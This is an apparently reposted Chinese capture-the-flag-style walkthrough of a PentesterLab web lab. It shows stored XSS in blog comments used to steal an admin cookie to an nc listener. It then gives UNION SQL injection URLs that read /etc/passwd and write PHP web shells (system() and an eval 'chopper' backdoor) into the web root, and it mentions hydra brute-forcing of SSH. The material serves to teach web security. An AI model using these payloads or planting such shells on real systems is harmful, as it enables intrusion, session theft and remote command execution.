php %3c php 攻击,web 攻击靶机解题过程
sql注入靶機攻擊過程請參考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶機的攻擊過程請參考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
在192.168.179.129機器上打開網頁:
是個博客系統。
每個博客標題下面可以評價:
測試下是否存在xss漏洞。
發現提交后有彈出框:
進一步構造內容
同時在192.168.179.142機器上用nc打開80端口。
在原來機器上登陸admin賬戶,密碼是p4ssw0rd
登陸進去后查看剛才發布的評論話題。
接著在142這臺機器查看nc的返回內容。
獲取到cookie信息。
復制下cookie,在142機器上打開評論所在的網頁。并修改cookie的值為剛才復制的值。
刷新下頁面,發現已經已admin的身份登錄進頁面中。
進入管理界面后,發現博客編輯界面存在sql注入漏洞。
http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4
發現2和3可以顯示出來。
http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4
可以讀取passwd文件,但是不能讀取shadow文件。我們嘗試能不能創建一個文件。
在編輯頁面發現錯誤提示中有/var/www/classes 目錄,
在查看源碼時發現有css目錄
嘗試后發現/var/www/css 目錄可寫。
于是構造語句:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打開
http://192.168.179.130/css/s.php
顯示:
說明s.php文件成功寫入到/var/www/css 目錄,下面將
寫入z.php中,構造url為:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
訪問z.php,并使用uname -a獲取系統信息。可以遠程執行命令。
下面寫入一句話木馬,構造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀鏈接:
之前發現機器開了ssh,因此用hydra爆破下:
ssh登陸
總結
以上是生活随笔為你收集整理的php %3c php 攻击,web 攻击靶机解题过程的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 长安CS35跑起来油门加了没反应,只能加
- 下一篇: oracle union详解,Oracl